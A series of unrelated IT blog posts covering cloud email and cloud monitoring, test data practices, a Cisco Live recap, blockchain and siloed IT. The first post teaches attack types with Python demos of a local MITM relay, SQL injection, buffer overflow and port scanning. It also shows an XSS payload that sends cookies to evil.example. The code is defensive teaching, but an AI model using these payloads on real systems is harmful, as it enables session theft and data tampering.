In the first blog of this series, we became familiar with some well-used cybersecurity terminology. This blog will look at some well-known attack and threat types and how they can be perpetrated. As a couple of readers pointed out, the definition of threat should focus on malicious (or inadvertent) actions on a computer system. So, although the network may allow threats to gain entry into an organization, it’s a specific target or vulnerable system that allows a threat to take hold.


This blog will look at three common categories of attack: Network, Web Application, and Endpoint.


Network Attacks


Denial of Service: The goal of a denial of service (DoS) attack is to make a machine or network resource unavailable to legitimate users by flooding the resource with an excessive volume of packets, rendering it inaccessible or even crashing the system. Some examples include TCP SYN floods and buffer overflows.


Distributed Denial of Service: In a distributed denial of service (DDoS) attack, the traffic flooding the victim originates from many different sources, making it harder to isolate and block any single source. DDoS attacks have grown in impact as increased capacity and bandwidth allow larger volumes of bogus traffic to be directed at a target system. Application-specific attacks also exist that focus on network infrastructure and infrastructure management tools, or on applications that may be flooded with maliciously crafted requests.



Man-in-the-middle: MITM occurs when a malicious actor hijacks an exchange between two parties, allowing the attacker to intercept, send, and receive data meant for someone else. In another form of MITM, an attacker may use a sniffer program to eavesdrop on a legitimate exchange. Some examples include email hijacking and Wi-Fi eavesdropping.
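The danger of unencrypted exchanges can be sketched with a toy intercepting relay: the victim believes it is connected to the real server, while its traffic passes through, and is recorded by, an attacker-controlled relay. (Everything below runs locally on loopback sockets; in real attacks the redirection happens via ARP or DNS spoofing, rogue access points, or similar.)

```python
import socket
import threading

captured = []  # what the "attacker" sees

def echo_server(listener):
    conn, _ = listener.accept()
    with conn:
        conn.sendall(conn.recv(1024))  # the legitimate server just echoes

def mitm_proxy(listener, server_port):
    conn, _ = listener.accept()
    with conn, socket.create_connection(("127.0.0.1", server_port)) as upstream:
        data = conn.recv(1024)
        captured.append(data)              # eavesdrop on the request
        upstream.sendall(data)             # forward it unmodified
        conn.sendall(upstream.recv(1024))  # relay the reply back

server_sock = socket.socket(); server_sock.bind(("127.0.0.1", 0)); server_sock.listen()
proxy_sock = socket.socket(); proxy_sock.bind(("127.0.0.1", 0)); proxy_sock.listen()
server_port = server_sock.getsockname()[1]
proxy_port = proxy_sock.getsockname()[1]

threading.Thread(target=echo_server, args=(server_sock,)).start()
threading.Thread(target=mitm_proxy, args=(proxy_sock, server_port)).start()

# The victim thinks proxy_port is the real service.
with socket.create_connection(("127.0.0.1", proxy_port)) as victim:
    victim.sendall(b"password=hunter2")
    reply = victim.recv(1024)

print(captured[0])  # the attacker now holds the plaintext credentials
```

The exchange works end to end, so neither party notices; only encryption (e.g., TLS) would deny the relay access to the plaintext.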


Web Application Attacks


SQL injection: Based on the insertion, or "injection," of malicious input into an SQL query, this attack manipulates a standard query to exploit non-validated input vulnerabilities in a database, allowing attackers to spoof identity and to tamper with, disclose, or destroy existing data. An inline attack can be accomplished by placing metacharacters into data inputs (for example, $username = 1' or '1' = '1), which are then executed as part of the SQL command in the control plane, as in SELECT * FROM Users WHERE username='1' OR '1' = '1', which returns every row because the condition '1' = '1' is always true.

Other examples of injections involve the use of end of line or inline comments, stacked queries, IF statements, and strings without quotes, as well as many others.
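The standard defense is to keep input in the data plane with parameterized queries. A minimal sketch using Python's built-in sqlite3 module (the table and data are invented for illustration):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE Users (username TEXT, secret TEXT)")
conn.execute("INSERT INTO Users VALUES ('alice', 's3cret')")

payload = "1' OR '1' = '1"  # the injection string from the example above

# Vulnerable: concatenating input into the query lets the payload become
# part of the SQL control plane -- the always-true condition returns every row.
vulnerable = conn.execute(
    "SELECT * FROM Users WHERE username='" + payload + "'"
).fetchall()

# Parameterized: the driver binds the payload strictly as data, so it
# matches no username and returns nothing.
safe = conn.execute(
    "SELECT * FROM Users WHERE username=?", (payload,)
).fetchall()

print(len(vulnerable), len(safe))  # expect: 1 0
```

The same placeholder pattern (`?` in sqlite3, `%s` in other drivers) defeats the comment, stacked-query, and unquoted-string variants as well, because the input is never parsed as SQL.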


Cross-site scripting (XSS): Injects malicious code into a vulnerable web application. Unlike SQL injection, which targets the application itself, XSS exploits a vulnerability within a website or web application to deliver a malicious script to a victim's browser. There are two main categories of XSS: stored (persistent) and reflected.

Reflected XSS bounces a malicious script off a web application into a user's browser, typically via an embedded link that delivers the script when clicked.
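The usual mitigation is output encoding: anything reflected back into a page is escaped so the browser renders it as inert text instead of executing it. A small sketch using Python's standard library (the payload and page template are illustrative):

```python
import html

# A typical reflected-XSS payload: steal the session cookie.
payload = '<script>document.location="https://evil.example/?c="+document.cookie</script>'

# Reflecting raw input re-emits the attacker's script into the page.
unsafe_page = "<p>Search results for: %s</p>" % payload

# Escaping converts the markup into inert text before it reaches the browser.
safe_page = "<p>Search results for: %s</p>" % html.escape(payload)

print("<script>" in unsafe_page, "<script>" in safe_page)  # True False
```

Most templating engines (Jinja2, Django templates, etc.) apply this escaping automatically; the danger arises when developers bypass it to emit "raw" HTML.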


Endpoint-based Attacks


Buffer overflows: This condition exists when a program writes more data to an allocated buffer than the buffer can hold, corrupting data, crashing the program, or enabling the execution of malicious code by overwriting a function's return pointer and thereby transferring control to the malicious code. Attackers research and identify buffer overflows in products and components, and then attempt to exploit them.
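Python is memory-safe, so a real overflow needs a language like C, but the mechanics can be simulated: model a stack frame as raw bytes in which a small buffer sits directly below the saved return address, then perform an unchecked copy. (The layout here is a deliberately simplified illustration, not a real calling convention.)

```python
# Simulated stack frame: an 8-byte local buffer followed by a
# "saved return address" occupying the next 8 bytes.
BUF_SIZE = 8
frame = bytearray(BUF_SIZE + 8)
frame[BUF_SIZE:] = (0x00400000).to_bytes(8, "little")  # legitimate return target

def unchecked_copy(dst, data):
    # Mimics C's strcpy: copies everything, with no bounds check against BUF_SIZE.
    dst[: len(data)] = data

# 8 bytes of filler, then 8 bytes that land on the return address.
attacker_input = b"A" * BUF_SIZE + (0xDEADBEEF).to_bytes(8, "little")
unchecked_copy(frame, attacker_input)

return_addr = int.from_bytes(frame[BUF_SIZE:], "little")
print(hex(return_addr))  # the overflow redirected control flow: 0xdeadbeef
```

In a real exploit, the overwritten address would point at attacker-supplied shellcode or a return-oriented-programming chain; mitigations such as stack canaries, ASLR, and bounds-checked copy functions all target exactly this write-past-the-end behavior.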


Command and control (C2): A C2 server is a computer controlled by an attacker that is used to send commands to systems compromised by malware and to receive stolen data from a target network; it also allows attackers to move laterally inside a network. C2 servers serve as the control point for compromised machines in a botnet.



Rootkit: A rootkit is a “hidden” program designed to provide continued privileged access to a computer. A rootkit may consist of a collection of tools that enable administrator-level access to a computer or network, or they can be associated with malware such as concealed Trojans, worms, and viruses.


Port scanning: Hackers use port-scanning techniques to identify potential vulnerabilities associated with specific computer ports. While not an attack in itself, this activity is known as reconnaissance and is often the precursor to other activities.
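As a rough illustration of how simple this reconnaissance can be, a TCP connect scan fits in a few lines of Python: attempt a handshake on each port and record those that accept. (This sketch probes only the local machine; scanning systems you don't own is generally unauthorized.)

```python
import socket

def scan(host, ports, timeout=0.3):
    """Return the subset of `ports` that accept a TCP connection."""
    open_ports = []
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                open_ports.append(port)
        except OSError:
            pass  # closed, filtered, or timed out
    return open_ports

# Demo against ourselves: open one listener on an ephemeral port, then scan it.
listener = socket.socket()
listener.bind(("127.0.0.1", 0))
listener.listen()
port = listener.getsockname()[1]

print(scan("127.0.0.1", [port, port + 1]))  # the listener's port shows up as open
```

Tools like Nmap layer far more on top (SYN scans, service fingerprinting, timing evasion), which is why defenders watch for exactly this pattern of many short-lived connection attempts.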


This is a summary of some of the more well-known attack types. It is a starting point only, and the reader is encouraged to research the ever-evolving threat landscape to understand the challenges faced by cybersecurity professionals in their quest to mitigate and protect against compromise. In the next blog, we will review some of the typical tools and methods available for these challenges.

By Paul Parker, SolarWinds Federal & National Government Chief Technologist


The federal government is eager to migrate to a cloud-based email system, and for good reasons. Cloud-based email offers huge operational benefits, especially considering the sheer number of users and the broad geographical footprint of the federal government. It is also much simpler and cheaper to secure and manage than on-premises email servers.


Cloud email also poses some unique challenges. IT managers must carefully track their email applications to ensure cloud-based email platforms remain reliable, accessible, and responsive. They must also continuously monitor for threats and vulnerabilities.


Unfortunately, even the major cloud-based email providers have had performance problems. Last year, Google suffered a massive and systemic issue across multiple platforms that affected all of its applications, including Gmail. This past February, a Yahoo Mail outage affected customers around the world for days. And the solution that many agencies rely on, Office 365, has been subject to service outages in Europe and in the United States.


Any amount of downtime or lost productivity is too much for federal agencies. Government employees rely on instantaneous communication to make decisions, and email is a technology that most federal organizations cannot live without.


Fortunately, many agencies are already actively monitoring their cloud environments. They simply need to apply similar practices, with some email-specific strategies, to help ensure a high level of performance and reliability.


Gain visibility into email performance


Sporadic issues, which can include network latency and bandwidth constraints, can directly influence the speed at which email is sent and delivered. These can be hard to identify without the proper tools and processes in place.


Administrators must have clear visibility into the everyday key performance metrics of their cloud-based email platforms. The cloud and cloud-based email systems can fall victim to many of the same threats that cause cybersecurity problems in a traditional environment.


Ideally, administrators should set up an environment that allows them to get a complete picture of their cloud-based email platform as it relates to whatever on-premises server they may be using. For example, administrators whose agencies use Office 365 in conjunction with Microsoft Exchange should be able to monitor both simultaneously, allowing them to more easily identify and fix issues as they arise.


Monitor mail paths


When email performance falters, it can be difficult to tell whether the fault lies in the application or the network. This challenge is often exacerbated when the application resides in the cloud, which can limit an administrator’s view of issues that might be affecting the application.


Application path monitoring can be crucial in gaining visibility into the performance of email applications, especially those that reside in a hosted environment. Administrators must be able to monitor the “hops” that requests take to and from their email servers to better understand service quality and identify any factors that may be inhibiting email performance. This visibility can help them troubleshoot problems without spending time trying to determine if the application or network is the source of the problem.
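Hop-by-hop path analysis takes dedicated tooling, but the basic building block is a timed probe. A minimal sketch that measures TCP connect latency (the Office 365 endpoint named in the comment is illustrative; the demo times a local listener so it is self-contained):

```python
import socket
import time

def connect_latency(host, port, timeout=2.0):
    """Time a TCP handshake to host:port, in milliseconds."""
    start = time.perf_counter()
    with socket.create_connection((host, port), timeout=timeout):
        return (time.perf_counter() - start) * 1000.0

# In practice the target would be something like ("outlook.office365.com", 443).
# For a self-contained demo, time a connection to a local listener instead.
listener = socket.socket()
listener.bind(("127.0.0.1", 0))
listener.listen()

latency_ms = connect_latency("127.0.0.1", listener.getsockname()[1])
print(f"{latency_ms:.2f} ms")
```

Probing like this on a schedule, and trending the results, is what lets an administrator say "the network path degraded at 2 p.m." rather than guessing whether the application or the network is at fault.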


While administrators have little control over when a server goes down at an email host location, they do have many options to manage and optimize their cloud-based email platforms. By applying their standard network monitoring solutions and strategies to their email platforms, they can gain better insight into the performance of cloud email servers and help keep communications up and running smoothly.


Find the full article on GCN.

In my earlier post in this data protection series, I mentioned that data security and privacy is difficult:


Building a culture that favours protecting data can be challenging. In fact, most of us who love our data spend a huge amount of time standing up for our data when it seems everyone else wants to take the easiest route to getting stuff done.


Today I'll be talking about one of the most insecure and unprotected ways we harm data during our development processes. And I'm warning you: these are all contentious positions I hold. I'm experienced (old) enough to stand up for these positions. I know I'm going to get flak for stating them. I'm ready. Are you? Let's start with the most contentious one.



In all my years of presenting to audiences about data protection, this is the position where we get the most disagreement. I understand those positions. But it is still my opinion that taking a backup and restoring to development and test environments is wrong.


Development environments are notoriously less secure than production ones. In the old days, developers connected to servers to do their development. Most of those servers were located in a data center and at least had those protections. Now I'm much more likely to see developers working on their own laptops, often personally owned ones. These are often shared devices, with little or no enterprise protections, because developers can't be constrained by such overhead and governance during development.


Because developers are system administrators of their local environments, they often remove most of the security features within their development environment to speed up development and test processes. Encryption, row level security, data masking, and other database features are likely to be removed.


Unlike production environments, development environments rarely have any data access monitoring and alerting solutions. Developers and DBAs tend to memorize data to facilitate their dev and test processes: they know the interesting customer records, transactions, and financial information that they use over and over for testing. The very thing they would not be allowed to do in production, they do every day in the dev environment that hosts production data.


Developers and DBAs tend to treat development data with less respect than production data because "it's just development." If something goes wrong, we can just rebuild it. The challenge with this thinking is that it's a dev environment with production data; it's not just development. This is one of the reasons we have recently seen a spike in data breaches due to IT professionals sharing their dev data in unsecured cloud storage buckets. Or they email production data, log it into bug-tracking systems, share it on a file server, or carry it around on unsecured thumb drives. "It's just test data, after all." No, it's not. It's still production data, even though you've moved it to a test environment.



When I recommend that teams stop using production data for development, the first thing they say is that this is the only test data they have. Yes, that's true. But it isn't the only way. We could develop test data based on the test cases we are going to run. That way we can test all the features of the applications, not just the features our current customer set reveals. We could generate more test data based on that data. We could require test case writers to create test data. Yes, that takes time.


I believe our industry should be developing a set of what I call lorem ipsum data for People, Places, Things, Events, Transactions, etc. This dataset could be crowdsourced and curated by the entire community. Yes, this will be hard work. Yes, it will require a lot of curation. No, it will not be much fun. But think of all the places your own personal data is located. How comfortable are you that your data is being used for development and test on perhaps millions of laptops around the planet? How comfortable are you that someone has chosen your home address and the list of your family members as the one record they have memorized for running their test-driven development processes?
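Generating such data doesn't require elaborate tooling; even the standard library can emit deterministic, realistic-shaped records. A sketch of the idea (all names and fields are invented, and the fixed seed keeps runs reproducible):

```python
import random

FIRST = ["Ada", "Grace", "Alan", "Edsger", "Radia"]
LAST = ["Lovelace", "Hopper", "Turing", "Dijkstra", "Perlman"]
CITIES = ["Springfield", "Riverton", "Lakeside"]

def make_person(rng):
    """One synthetic 'People' record -- no production data involved."""
    return {
        "name": f"{rng.choice(FIRST)} {rng.choice(LAST)}",
        "city": rng.choice(CITIES),
        "account_id": rng.randrange(10_000, 99_999),
        "balance": round(rng.uniform(0, 5_000), 2),
    }

rng = random.Random(42)  # seeded so every test run sees identical data
people = [make_person(rng) for _ in range(3)]
for p in people:
    print(p)
```

Because the seed pins down every record, test cases can assert against "known" customers without a single real person's data ever leaving production. Libraries like Faker take this same approach much further.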


I do believe there are valid cases where production data should be used in special testing scenarios. First, if you are doing a data migration project, at some point you still need to do a test migration using a subset of your production data. These tests would be just prior to completing the actual migration. But that production data would still be in its secured formats; it would not be used for the earlier dev and test processes.


Another example is when you are testing the application of new security features in your database environment and you want to see if there are any cases where your existing data or design has challenges implementing those features. Again, this test would be done late in the process.


There may be other use cases where testing with production data is required, but none of them should form the basis of using production data for general development and test methods. You can test them on me in the comments.



I've come to this position after decades of watching people's data being treated with disrespect because it's a faster way to do lesser testing (more on this “lesser testing” in a future post). That should seem wrong to all of you, and I know a few people who share these positions with me, even if I'm overwhelmingly outnumbered. One of the key things that has changed over the last few years is news of data breaches due to exposure of production data in development environments. I don't believe the number of breaches has increased; I believe the number of breach disclosures has increased due to data privacy notifications. With GDPR, we will also have significant fines and even jail terms due to sloppy data practices. How much do you really love that job that you are willing to risk this?


I recommend you start the discussions about generating real test data now. At least you will have shown you tried to take steps to protect data. Your defense lawyer will thank you.


Hey everyone, I've had a chance to decompress and gather my thoughts from Cisco Live US 2018 (#CLUS18, as the cool kids say). So, pour yourself a liquid refreshment, sit back, and let me tell you how it went.


Location, Location, Location

After two years in the climatological hellscape that is Las Vegas (June clocks in at about 110 degrees!), Orlando made a refreshing change. And I'm told that our week at Cisco Live was pretty typical: It hovered around 90 degrees, was humid enough that you could use a jet ski to get from the hotel to the venue, and there was a torrential downpour each night around 5 p.m. Not that I'm complaining. OK, maybe a little.


However, folks down near the house of the mouse have mastered the art of A/C—you never went into hypothermic shock from walking into a store, bus, or convention center. You just walked in and it was... good. Nice. And the afternoon rains tended to cool everything down, but they didn't stick around long enough to completely trash whatever nighttime plans you made.


The View from the Booth

I'm going to write more about this elsewhere, but the thing that struck me most was that software defined networking (SDN) seems to have finally arrived (at least for some) in the enterprise. This was the first time a customer—a real live, breathing, non-carrier customer—came to the booth and told me they were running SDN in their production environment. And they were REALLY running it: 2 production and 2 dev environments. That shows me SDN (via Cisco’s ACI and yes, it’s different, but close enough for this conversation) is finally finding a place in the typical enterprise, not just ISPs.


Meanwhile, folks who visited the booth had an insanely positive response to the SolarWinds story. Make no mistake, scalability is an evergreen topic that comes up at EVERY show. But with the improvements introduced in NPM 12.3 (and NTA 4.4, and NCM 7.8), it was such a fun conversation. It was the first time that people told me “Oh, THAT much? Oh, we don't need THAT much.” Automated mapping put a smile on people’s faces. And the interface code snippets were the sleeper “take my money” hit of the convention.


This year we had a prime spot and got to view a lot of the typical #CLUS antics up close. Of course, people came to us to help satisfy their #SocksOfCLUS cravings. #KiltedMonday was extremely well-attended (and included our own Kevin Sparenberg). And this year saw the first ever #ColumnsOfCLUS trend, where people took selfies next to the columns with SolarWinds information on them for fun, fame, and even prizes.


Heard it Through the Grapevine

This year I heard some amazingly compelling stories from attendees that helped me understand the boots-on-the-ground reality for network specialists.


One person I spoke to has been in networking for over 3 decades. This was his first Cisco Live since San Diego in 2015. He attended the full week including the Sat/Sun sessions and came away both impressed and slightly depressed. His comment was that “DNA looks amazing. We have to have it. But Cisco needs to understand that for guys like me, there’s an 8-year lead time. Going to DNA isn't like replacing our 3650s with 4900 series devices one at a time as budget permits. To make this new technology work, all our infrastructure has to change. I work in the medical sector. We’ve got money. But it’s hard to justify new gear when the current gear is still passing packets. I’ll keep an eye on it, but it ain’t happening right now.”


Another IT pro had a more hopeful story for me regarding his growth. He was working as a substitute teacher back in 2009, when on a lark he interviewed for a level 1, third shift NOC position. He used that third shift time to learn everything he could, made a couple of smart job hops, kept pushing for more challenging projects, and is now a lead network engineer at his company. But because of his NOC experience, he remained the go-to person for monitoring at each job. That's what allowed him to have access to the new equipment, and to be part of setting up and maintaining that gear.


There were some interesting stories (i.e., gossip) to be overheard both on social media and as I passed people in the halls between sessions. For example, there was this comment on Twitter:


"I just heard @ChuckRobbins say that the transition to ACI and orchestration is incredibly complicated. I can’t count the number of times I’ve been shouted down by @Cisco engineers for saying the exact same thing. Refreshing to hear from the top."


Cisco’s developer network, aka DevNet, announced that it had reached 500,000 members since the program was created in 2014. That is also noteworthy. Life as code indeed!


The #SWUG Life

Cisco Live's total domination of Orlando meant that space was at a premium, which left Danielle Higgins—our stalwart THWACK guru and SWUG coordinator—with a challenge. We knew we had to get our SolarWinds users together, but WHERE? In the end Danielle picked what I believe to be the perfect location, @ThePub, where we could get a drink AND our geek on. After a long day of sessions, demos, and conversations, The Pub was a welcome setting.


The Home Fires Were Definitely Burning

While I was rolling around Cisco Live, my kids were trolling me from home. What started at Cisco Live US 2017 and continued through Cisco Live Europe 2018 hit perhaps (I hope) its pinnacle at #CLUS18. They posted sad faces. They played Quidditch from my rooftop. They slow-mo sledgehammered my network gear. The Cisco Live social media team awarded them "Best remote attendee," but I now need to figure out how I'm ever going to feel safe leaving home again.



Final Thoughts

The theme of the opening keynote was "chaos and wonder," and I'm OK with that. Anyone who has worked in IT gets the "chaos" part. Anyone who has been watching the industry these last 4 years also understands that pretty well.


But the “wonder” part… that makes me happy. As IT practitioners and networking specialists, what we are able to do—what we GET to do—on a regular basis is still insanely cool. Sometimes it’s legitimately the stuff of science fiction. And while many of us treat it as “ho-hum, that’s my day job,” to folks who are NOT in IT, it’s nothing short of miraculous.


And it is. Sometimes we need to recapture and revel in the sheer wonder of what we do.

This week's Actuator comes to you fireside, as I am able to start enjoying the results of three weeks' worth of hard work building an outdoor living area. We had planned to hire someone to do this work, but they never got back to us, so we decided we could do it ourselves. It's been exhausting, but rewarding. There's something to be said for building things yourself. But not databases. Let a professional help you, please.


As always, here are some links from the Intertubz that I hope will hold your interest. Enjoy!


Python has brought computer programming to a vast new audience

People are using Google to search for Python more than they are searching for a Kardashian. Also worth mentioning: Python gets its name from Monty Python.


Netflix Cloud Security SIRT releases Diffy: A Differencing Engine for Digital Forensics in the Cloud

Another great example of Netflix being awesome. I love how they are taking their internal tools and making them available for others to use and, in theory, improve upon over time for the benefit of everyone.


Surprise! Top sites still fail at encouraging non-terrible passwords

In related news, I am spending up to 30 minutes of my day logging into websites and having to retrieve passwords from 1Password or using two-factor authentication. Security has a cost, and part of that cost is time spent logging into websites, apparently.


Hackers account for 90% of login attempts at online retailers

This is why we can’t have nice things.


Why health insurers track when you buy plus-size clothes or binge-watch TV

As someone who has had difficulty with Optum, this article drives home how healthcare decisions are being made. What should be in the hands of doctors is often in the hands of a computer program and a person who has no idea about you, your health, or your needs.


Colleges ask for a share of future salary in lieu of loans

At first I thought this idea was horrible, but after reading it a few times and thinking about it a bit more, I now think this is a terrible idea. Schools are a business, diploma mills mostly, and this financial arrangement has the potential for abuse.


The mistake that almost got me fired but transformed my career

If you haven’t hit this point in your career, I hope you do soon. Or keep an updated resume handy.


One of the joys of summer - carnival food! Here's a sausage, topped with pulled pork, topped with bacon:


What happens to our applications and infrastructure when we place them in the cloud?  Have you ever felt like you’ve lost insight into your infrastructure after migrating it to the cloud?  There seems to be a common complaint among organizations that at one point in time had an on-premises infrastructure or application package. After migrating those workloads to the cloud, they feel like they don’t have as much ownership and insight into it as they used to.


That is expected when you migrate an on-premises workload to the cloud: it no longer physically exists within your workplace.  On top of your applications or infrastructure being out of your sight physically, there is now a web service (depending on the cloud service) that adds another layer of separation between you and your data. This is the world we now live in; the cloud has become a legitimate option to store not only personal data, but enterprise data and even government data. It’s going to be a long road to 100% trust in storing workloads in the cloud, so here are some ways you can still feel good about monitoring your systems/infrastructures/applications that you’ve migrated to the cloud.


Cloud Systems Monitoring Tools

Depending on your cloud hosting vendor, you may have some built-in tools that you can use to maintain visibility into your infrastructure and applications. Here's a look at each of the big players in the cloud hosting game and the built-in tools they offer for systems monitoring:


Amazon Web Services CloudWatch

AWS has become a titan in the cloud hosting space, and it doesn't look like they're slowing down anytime soon. Amazon offers a utility called Amazon CloudWatch that gives you visibility into your cloud resources and applications. CloudWatch allows you to see metrics such as CPU utilization, memory utilization, and other key metrics that you define. Amazon's website summarizes CloudWatch as follows:

“Amazon CloudWatch is a monitoring and management service built for developers, system operators, site reliability engineers (SRE), and IT managers. CloudWatch provides you with data and actionable insights to monitor your applications, understand and respond to system-wide performance changes, optimize resource utilization, and get a unified view of operational health. CloudWatch collects monitoring and operational data in the form of logs, metrics, and events, providing you with a unified view of AWS resources, applications and services that run on AWS, and on-premises servers. You can use CloudWatch to set high resolution alarms, visualize logs and metrics side by side, take automated actions, troubleshoot issues, and discover insights to optimize your applications, and ensure they are running smoothly (AWS CloudWatch).”


Microsoft Azure Monitor:

Azure Monitor is a monitoring tool that allows users to navigate different key metrics gathered from applications, application logs, Guest OS, Host VMs, and activity logs within the Azure infrastructure. Azure Monitor visualizes those key metrics through graphics, portals views, dashboards, and different charts. Through Azure Monitor’s landing page, admins can onboard, configure, and manage their infrastructure and application metrics. Microsoft describes Azure Monitor as follows:

“Azure Monitor provides base-level infrastructure metrics and logs for most services in Microsoft Azure. Azure services that do not yet put their data into Azure Monitor will put it there in the future (MS Azure website)… Azure Monitor enables core monitoring for Azure services by allowing the collection of metrics, activity logs, and diagnostic logs. For example, the activity log tells you when new resources are created or modified.”


Full-Stack Monitoring, Powered by Google:

Google Cloud has made leaps and bounds in the cloud hosting space in the last few years and is poised to be Amazon's main competitor. Much like Microsoft and Amazon, Google Cloud offers a robust monitoring tool called Full-Stack Monitoring, Powered by Google. Full-Stack Monitoring offers the administrator complete visibility into their applications and platform, presenting a rich dashboard with metrics such as performance, uptime, and health of the cloud-powered applications stored in Google Cloud. Google lays out a great explanation and list of benefits that Full-Stack Monitoring provides to the end user:

“Stackdriver Monitoring provides visibility into the performance, uptime, and overall health of cloud-powered applications. Stackdriver collects metrics, events, and metadata from Google Cloud Platform, Amazon Web Services, hosted uptime probes, application instrumentation, and a variety of common application components including Cassandra, Nginx, Apache Web Server, Elasticsearch, and many others. Stackdriver ingests that data and generates insights via dashboards, charts, and alerts. Stackdriver alerting helps you collaborate by integrating with Slack, PagerDuty, HipChat, Campfire, and more (Google Cloud website).”


Trust but Verify

While there are several great proprietary tools provided by the cloud vendor of choice, it's imperative to verify that the metrics gathered are accurate. There are many free tools out there that can be run against your cloud infrastructure or cloud-driven applications. While it's become increasingly acceptable to trust large cloud vendors such as Google, Amazon, and Microsoft, the burden rests on the organization to verify the data it receives in return.

By Paul Parker, SolarWinds Federal & National Government Chief Technologist


Blockchain is no longer just a buzzword or simply a “technology to watch.” This database technology is being explored by agencies across government. The promise of blockchain is dramatic. It can help enhance agencies’ business processes and provide far greater transparency and efficiency.


That said, for federal IT professionals in particular, understanding blockchain technology—as well as its advantages and potential downsides—is a critical first step in determining its viability within an agency setting and its true potential and impact.


Blockchain 101


Blockchain is a peer-to-peer distributed database technology created as the platform for Bitcoin exchange. In a nutshell, the technology uses a vast number of interconnected peer-based computers to store blocks of information. This distributed database of information is continually updated and reconciled.


One of the primary advantages of blockchain is that it can authenticate a user’s identity and create verifiable histories of transactions that take place within the network. In fact, the technology does this automatically. It supports interactions between machines that can eliminate the need for human intervention or oversight.
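That verifiable history comes from each block carrying a hash of its predecessor, so altering any past record breaks every link after it. A toy sketch using Python's hashlib (real blockchains layer consensus, signatures, and distribution on top of this):

```python
import hashlib
import json

def block_hash(block):
    payload = json.dumps(block, sort_keys=True).encode()
    return hashlib.sha256(payload).hexdigest()

def add_block(chain, data):
    prev = block_hash(chain[-1]) if chain else "0" * 64
    chain.append({"data": data, "prev_hash": prev})

def verify(chain):
    """True only if every block still points at its predecessor's hash."""
    return all(
        chain[i]["prev_hash"] == block_hash(chain[i - 1])
        for i in range(1, len(chain))
    )

chain = []
for record in ["permit #101 issued", "permit #101 renewed", "license granted"]:
    add_block(chain, record)

print(verify(chain))                      # True: history intact
chain[0]["data"] = "permit #999 issued"   # tamper with an old record
print(verify(chain))                      # False: every later link now fails
```

Because rewriting one block forces rewriting every subsequent block on a majority of the distributed copies, tampering becomes detectable and impractical, which is exactly the property agencies want for transaction histories.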


Additional advantages of blockchain are that there is no single point of failure, and it is not controlled by any one entity. The primary disadvantages stem from blockchain still being a relatively new technology. For example, there are questions about (and challenges with) scalability and performance. There is also the challenge of complexity, as well as a current lack of industry standards.


Having started as the platform that manages Bitcoin transactions, blockchain is seeing quick entry into the financial industry, as nearly every major bank worldwide is testing the technology in some capacity. Banks are betting that blockchain can be used to create a secure alternative to time-consuming and expensive banking processes through dramatically increased automation.


Financial institutions, and associated banking applications, are only one small example of the types of organizations and applications that can benefit from the type of enhanced automation this technology provides.


Some natural progressions for the technology are identity management and transaction verification. At a time when agencies are finding it difficult to deal with data management and security, blockchain provides a seemingly perfect solution. GSA, for example, is looking into how blockchain technology can speed up IT Schedule 70 contract processing through enhanced automation.


Going one step further, supply chain use cases are now being tested and implemented to ensure the safety, security, and integrity of the information associated with these processes. Case in point: the Federal Maritime Commission is exploring blockchain for licensing and permitting processes.




Rest assured, we are only seeing the tip of the iceberg in blockchain testing and implementation within the federal government. There are already federally focused organizations—the Government Blockchain Association and DC Blockchain Center, for example—designed specifically to explore how the government can use this technology to enhance business processes and to provide greater transparency and efficiency. Stay tuned. There will most certainly be more, and that’s great news.


Find the full article on our partner DLT’s blog Technically Speaking.

Many of us have operated, or currently operate, in a stovepipe or silo IT environment. For some this may just be a way of professional life, but regardless of how the organizational structure is put together, having a wide and full understanding of any environment will lend itself to a smoother and more efficient system overall. As separation of duties continues to blur in the IT world, it is becoming increasingly important to shift how we as systems and network professionals view the individual components and the overall ecosystem. As these changes and tidal shifts occur, Linux is appearing in the switching and routing infrastructure, servers are consuming BGP feeds and making intelligent routing choices, and orchestration workflows are automating the network and the services it provides -- all of these things are slowly creeping into more enterprises, more data centers, and more service providers. What does this mean for the average IT engineer? It typically means that we, as professionals, need to keep abreast of workflows and IT environments as a holistic system rather than a set of distinct silos or disciplines.


This mentality is especially important in monitoring aspects of any IT organization, and it is a good habit to start even before these shifts occur. Understanding the large-scale behavior of IT in your environment will allow engineers and practitioners to accomplish significantly more with less -- and that is a win for everyone. Understanding how your servers interact with the DNS infrastructure, the switching fabric, the back-end storage, and the management mechanisms (i.e. handcrafted curation of configurations or automation) naturally lends itself to faster mean time to repair due to a deeper understanding of an IT organization, rather than a piece, or service that is part of it.


One might think “I don’t need to worry about Linux on my switches and routing on my servers,” and that may be true. However, expanding the knowledge domain from a small box to a large container filled with boxes will allow a person to not just understand the attributes of their box, but the characteristics of all of the boxes together. For example, understanding that the new application will make a DNS query for every single packet the application sees, when past applications did local caching, can dramatically decrease the downtime that occurs when the underlying systems hosting DNS become overloaded and slow to respond. The same can be said for moving to cloud services: Having a clear baseline of link traffic -- both internal and external -- will make obvious that the new cloud application requires more bandwidth and perhaps less storage.
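To put a number on the caching example, here is a small Python sketch. The `query_dns_server` function is a stand-in for a real lookup (such as `socket.gethostbyname`); the hostname and address are invented. The point is that a local cache collapses thousands of repeated queries into one, which is exactly the load difference between the old application and the new one.

```python
from functools import lru_cache

dns_queries = {"count": 0}  # how many queries actually reach the DNS server

def query_dns_server(hostname):
    """Stand-in for a real DNS lookup (e.g. socket.gethostbyname)."""
    dns_queries["count"] += 1
    return "192.0.2.10"  # TEST-NET address; a real resolver returns the record

@lru_cache(maxsize=1024)
def resolve(hostname):
    """Cached resolution: only the first lookup per name leaves the host."""
    return query_dns_server(hostname)

# An application handling 10,000 packets for the same service name:
for _ in range(10_000):
    resolve("app.example.com")

print(dns_queries["count"])  # → 1 query instead of 10,000
```

An application that skips this cache sends all 10,000 queries to the DNS infrastructure, which is why a seemingly unrelated DNS slowdown can take the application down with it.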


Fear not! This is not a cry to become a developer or a sysadmin. It's not a declaration that there is a hole in the boat or a dramatic statement that "IT as we know it is over!" Instead, it is a suggestion to look at your IT environment in a new light. See it as a functioning system rather than a set of disjointed bits of hardware with different uses and diverse managing entities (i.e. silos). The network is the circulatory system, the servers and services are the intelligence. The storage is the memory, and the security is the skin and immune system. Can they stand alone on technical merit? Not really. When they work in concert, is the world a happier place to be? Absolutely. Understand the interactions. Embrace the collaborations. Over time, when this can happen, the overall reliability will be far, far higher.


